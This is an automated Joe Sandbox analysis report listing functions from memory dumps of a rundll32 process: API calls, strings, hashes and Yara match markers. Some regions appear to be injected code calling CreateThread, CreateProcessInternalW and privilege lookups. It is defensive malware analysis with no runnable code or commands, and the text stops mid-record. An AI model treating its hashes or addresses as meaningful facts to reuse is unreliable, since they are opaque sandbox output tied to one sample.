Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e34ab19dc40f4f1a3bab41e8d5813696d28d914f8a17ced5f12515099c9da82
Instruction ID: 381c39328649ea6c4191b77e354604d232881e5e50858fd60c423b3125542dad
Opcode Fuzzy Hash: 3e34ab19dc40f4f1a3bab41e8d5813696d28d914f8a17ced5f12515099c9da82
Instruction Fuzzy Hash: 03900221211D0042F200B5684D18B47004D8BD4307F55C125A0556554CC915D9615961

Function 049A2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2F3A

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 91a301f3b212255bfe5573565247441cb3218fa87eddefa857191a887657e0c6
Instruction ID: 7d6baa1165175b2b256416f124d1f5241059334df36fec24be0e823f9b122295
Opcode Fuzzy Hash: 91a301f3b212255bfe5573565247441cb3218fa87eddefa857191a887657e0c6
Instruction Fuzzy Hash: 8E90026134150442F100B1584918B46004DCBE5305F55C025E1466554D8619DD526566

Function 049A2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2ADA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50284f0872f6bd13bee4722ca0aa299785866a75a046f9a00bd71edd1b806893
Instruction ID: 1f538fb53d99e6bfc149984a32c677f1ec99147071e55d2b291bc8d842517e50
Opcode Fuzzy Hash: 50284f0872f6bd13bee4722ca0aa299785866a75a046f9a00bd71edd1b806893
Instruction Fuzzy Hash: 9A900225211500032105F5580B08547008E8BD9355355C031F1417550CD621D9615561

Function 049A2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2BFA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b89e3ea8dbd86de19591ae681b0d7c079f88556100f1e8f1f2fda84540be2cd
Instruction ID: e6c1de983b77e588e8a83505fbee7a13d24c35259fc5403711ad0876354ef356
Opcode Fuzzy Hash: 9b89e3ea8dbd86de19591ae681b0d7c079f88556100f1e8f1f2fda84540be2cd
Instruction Fuzzy Hash: 8290023120150802F180B158490868A004D8BD5305F95C025A0427654DCA15DB597BE1

Function 049A2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2BEA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e96ade282109d3a0a82f36ac539843ec2fb92193bb4e708834ae5996d302ba73
Instruction ID: ba820372892dee031f416e462c972786685941f02baafc475902e22fbbc8b3b5
Opcode Fuzzy Hash: e96ade282109d3a0a82f36ac539843ec2fb92193bb4e708834ae5996d302ba73
Instruction Fuzzy Hash: 4690023120554842F140B1584908A86005D8BD4309F55C021A0466694D9625DE55BAA1

Function 049A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2B6A

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 725f3b23217847736b79de9cede0209e026d7a131580f1ef1778711e1242ac7b
Instruction ID: 577fa960d360b8712a8df5558a4934d4ca89d3017182315b8439d38e1040ee7b
Opcode Fuzzy Hash: 725f3b23217847736b79de9cede0209e026d7a131580f1ef1778711e1242ac7b
Instruction Fuzzy Hash: 63900261202500036105B1584918656404E8BE4205B55C031E1416590DC525D9916565

Function 049A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A35CA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c14c476d65d765e4f462c297d0e1a9fb9615cb33e2c9cbf363bcfb283af774fe
Instruction ID: 19ff4527b287843ea93f9bdeabb9917b2cc7432da4f82f3e517b153c049c4628
Opcode Fuzzy Hash: c14c476d65d765e4f462c297d0e1a9fb9615cb33e2c9cbf363bcfb283af774fe
Instruction Fuzzy Hash: E090023160560402F100B1584A18746104D8BD4205F65C421A0826568D8795DA5169E2

Function 007A9070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 007A9118

Strings

net.dll, xrefs: 007A90E1, 007A9167, 007A913F, 007A914B, 007A9173
wininet.dll, xrefs: 007A90CE, 007A90D7

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 7ed88bf67dbf4bad71974df8e21c5d54c8f32e3d265ed98b999e141507852e89
Instruction ID: a14148c04270efc79c96816bdc521f6950ee5d6695b000cd380676a13ca12c24
Opcode Fuzzy Hash: 7ed88bf67dbf4bad71974df8e21c5d54c8f32e3d265ed98b999e141507852e89
Instruction Fuzzy Hash: 6531A1B2900705FBC724DF64C889F67B7B8BB89B01F10851DF62A5B245DB34A660CBA5

Function 007A9067 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 007A9118

Strings

net.dll, xrefs: 007A90E1, 007A913F, 007A914B
wininet.dll, xrefs: 007A90CE, 007A90D7

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 97e766ba82bd21325750f3801e752769b7edd76ebfd661f751cac1b712f3039f
Instruction ID: e4df9036f9157f4be3eecf86da8ad8128ff97bee64a249c7e5447cb3274a9895
Opcode Fuzzy Hash: 97e766ba82bd21325750f3801e752769b7edd76ebfd661f751cac1b712f3039f
Instruction Fuzzy Hash: 4721E4B1940305FBC714DF64C889F67B7B4BB89700F10815DF6295B246D778A520CBA5

Function 007AA660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00793AF8), ref: 007AA68D

Strings

.z`, xrefs: 007AA67C, 007AA688

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: f255a0ec1638ce260ebe8d7744b26c2a2304657733017b692d34495965fa7ace
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: B4E012B1200208AFDB18EF99CC49EA777ACAF88750F018658BA1C5B242C630E910CAB0

Function 007AA620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&Ez,?,007A4C9F,007A4C9F,?,007A4526,?,?,?,?,?,00000000,00000000,?), ref: 007AA64D

Strings

&Ez, xrefs: 007AA642, 007AA64C

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &Ez
API String ID: 1279760036-4267687970
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: b1eeeaba7f2c89ec4879b9fc528f5a9ef8e775e838a5c4a4c9f99121826f8ac6
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 14E012B1200208AFDB18EF99CC45EA777ACAF88654F118558BA1C5B242C630F910CBB0

Function 00798310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0079836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0079838B

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: 872391ecd9e47a66e5aceded93f891a03df9c9c53924f59689d24eb710828263
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: E901A731A81228B7EB21A6949C47FFE776C6B41F50F040214FF04BA1C2E6D8690546F6

Function 0079ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0079AD52

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: c4a7d0aee2d8bfa818ce3ff55ca8f645dbdfd38d62ab0af3d06207add10b657a
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 70014CB5E4020DBBDF10EAE4EC46F9EB7789B54308F0042A4A90997641F634EA04CB92

Function 007AA6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007AA724

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 730bfce39f5a29cacb8beedea82ff3b8cd74805771e93e21cda01b854f229930
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: F601B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Function 007AA6CD Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007AA724

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 72ff0993656aa47b16fe25092ef5bcb3a7899c1fb6d6468eb2010bf54de32f6b
Instruction ID: 8a44ca932ae9a6c21ca132686e16eca3e1187af8bf19dcefe029fb23464aff30
Opcode Fuzzy Hash: 72ff0993656aa47b16fe25092ef5bcb3a7899c1fb6d6468eb2010bf54de32f6b
Instruction Fuzzy Hash: 1201A4B2200108BFCB54DF89DD80EEB77AEAF8C354F158248BA1DD7251C630E951CBA0

Function 007A91A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0079F040,?,?,00000000), ref: 007A91DC

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0c5ca6d4c7e301a8f587fc596a1b38b8420365de227eb8d3e274ef6237d30cb9
Instruction ID: f03164d4cd87050d0c93fcb74e3e440f5620a977b4fc0d20cfb7ddff2846fe20
Opcode Fuzzy Hash: 0c5ca6d4c7e301a8f587fc596a1b38b8420365de227eb8d3e274ef6237d30cb9
Instruction Fuzzy Hash: C3E06D333902047AE22065A9EC02FA7B39C9BC2B20F140126FB0DEB2C1D59AF80142A4

Function 007A9196 Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0079F040,?,?,00000000), ref: 007A91DC

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4f6025de85842b789f25400ea47d317924f8f1961ab5a8d3bdb8e24435636f33
Instruction ID: 6f106d31b3f07dc6ccd272f81c830e1f3b923b3407eb3b45e4f285e67583836a
Opcode Fuzzy Hash: 4f6025de85842b789f25400ea47d317924f8f1961ab5a8d3bdb8e24435636f33
Instruction Fuzzy Hash: B1E09277390204BAE2316698DC03FAB77A99BD2B10F150129F709EB2C1D5AAB90142A5

Function 007AA7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0079F1C2,0079F1C2,?,00000000,?,?), ref: 007AA7F0

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 479538a8da233ad1b8b6b097e1c16f2e799c56031715b9e14df79aefa9dcd862
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: C4E01AB1200208AFDB14DF49CC85EE737ADAF89650F018154BA0C57241CA34E9108BF5

Function 007AA7BD Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0079F1C2,0079F1C2,?,00000000,?,?), ref: 007AA7F0

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: fb780fc6cee316e2d03e04fc2132e1abb928f6ef3c4b2debe0297613b0e2e9f7
Instruction ID: 703e3eb99cade40cd7aea1f62c983cdccf975a87ef71ce45611e8ee94686c14f
Opcode Fuzzy Hash: fb780fc6cee316e2d03e04fc2132e1abb928f6ef3c4b2debe0297613b0e2e9f7
Instruction Fuzzy Hash: 63E0DFB5204250AFCB24DF54DC81EEB3BA8EF85220F048598FC8C1B203C534E804CBB4

Function 0079F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00798D14,?), ref: 0079F6EB

Memory Dump Source

Source File: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_790000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: d46974c5b0bbafaaba78ac02bd34c8819828d9b2ab629bc032c74422672e1e4e
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 4AD0A7727503043BEA10FAA49C07F2633CC6B85B00F490074F948D73C3D959F4004165

Function 049A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049A2C24

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f95bd89821471824d9afa840b8118212594b5efe182c2149d1c0c17a8dda3ec
Instruction ID: af5cdee323d8401161546fffbd64736052392327eab3aac0742258f28af74b5d
Opcode Fuzzy Hash: 5f95bd89821471824d9afa840b8118212594b5efe182c2149d1c0c17a8dda3ec
Instruction Fuzzy Hash: F8B09B719015C5C5FB11F7604B0C71779586BD0705F15C0B1D2431651E4738D1D1E5F5

Non-executed Functions

Function 00A04136 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 193memorylibrarynativeCOMMON

Download Yara Rule

APIs

HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00A0414D
NtSetInformationProcess.NTDLL(000000FF,00000022,?,00000004), ref: 00A04162
AttachConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0(000000FF), ref: 00A04199
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00A041B1
LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(WLDP.DLL,00000000,00000800,?,?,?), ref: 00A0420E
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,WldpIsAllowedEntryPoint), ref: 00A04220
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00008001), ref: 00A0428A
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00A04345
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00A0434F
DeactivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000000,00000000), ref: 00A04386
ReleaseActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?), ref: 00A0438D

Part of subcall function 00A037C3: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00A037D4
Part of subcall function 00A037C3: CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00A019CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00A037F0
Part of subcall function 00A037C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00A03808
Part of subcall function 00A037C3: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A0381D
Part of subcall function 00A037C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00A03866
Part of subcall function 00A037C3: SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03873
Part of subcall function 00A037C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00A0387A
Part of subcall function 00A037C3: CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00A08420,?), ref: 00A03897
Part of subcall function 00A037C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00A038D9
Part of subcall function 00A037C3: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00A038E7

FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00A04398
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00A043A1
FreeConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0 ref: 00A043B0
ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A043B7

Strings

requestedRunLevel, xrefs: 00A04362
WLDP.DLL, xrefs: 00A04209
localserver, xrefs: 00A04261
WldpIsAllowedEntryPoint, xrefs: 00A0421A

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: Free$EventLibraryLocal$CloseConsoleCreateHandleInformationInitializeProcess$AddressAllocAttachCurrentDeactivateErrorExitHandlesHeapLoadModeMultipleProcReleaseSecurityThreadUninitializeWait
String ID: WLDP.DLL$WldpIsAllowedEntryPoint$localserver$requestedRunLevel
API String ID: 3307762745-3890604504
Opcode ID: f95332070de5160afc765765c260005b9afbd5d0499076377c60954ad9b7a314
Instruction ID: ba4bb0edea5125fde9ec691e8331f0c51b60c855d03eab82db4230d3518e5147
Opcode Fuzzy Hash: f95332070de5160afc765765c260005b9afbd5d0499076377c60954ad9b7a314
Instruction Fuzzy Hash: 2B617EB1604309ABD710DF60ED45A6F77E9BFCC714F044A18BA95961E1CB34D90ACB52

Function 00A05D6A Relevance: 10.6, APIs: 7, Instructions: 87nativeCOMMON

Download Yara Rule

APIs

NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00A05D8E
RtlNtStatusToDosError.NTDLL ref: 00A05D95
NtClose.NTDLL ref: 00A05DBE
QueryActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(80000000,00000000,00000000,00000005,?,0000000C,00000000), ref: 00A05DED
NtOpenProcessToken.NTDLL(000000FF,00000080,?), ref: 00A05E13
NtSetInformationToken.NTDLL ref: 00A05E2F
NtClose.NTDLL ref: 00A05E38

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: Token$CloseOpenProcess$ErrorInformationQueryStatus
String ID:
API String ID: 3674487995-0
Opcode ID: 4597a324335065319c1df4192328d3f3f3f341f0f5ea412be815b22773f1f859
Instruction ID: f716c7f0c0a5bdde85359db18db965ef44744917c4f696dcc6491f3d3b5f9cc9
Opcode Fuzzy Hash: 4597a324335065319c1df4192328d3f3f3f341f0f5ea412be815b22773f1f859
Instruction Fuzzy Hash: 63218232E0061DABDB20DBE4DD49BAF7B78EB48721F150215EA55B71E0DA309D05CBA0

Function 00A03C66 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84librarywindowCOMMON

Download Yara Rule

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00A03C87
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00A03C93
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000104,00000000,?,00000000,00000008), ref: 00A03CF2

Part of subcall function 00A03B09: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00A03B39
Part of subcall function 00A03B09: IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00A03B40
Part of subcall function 00A03B09: GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00A03B6C
Part of subcall function 00A03B09: PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00A03B87

RtlImageNtHeader.NTDLL(00000000), ref: 00A03D13
SetProcessMitigationPolicy.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000000,?,00000008,?,00000000,00000008), ref: 00A03D4B

Strings

`(u, xrefs: 00A03C93

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

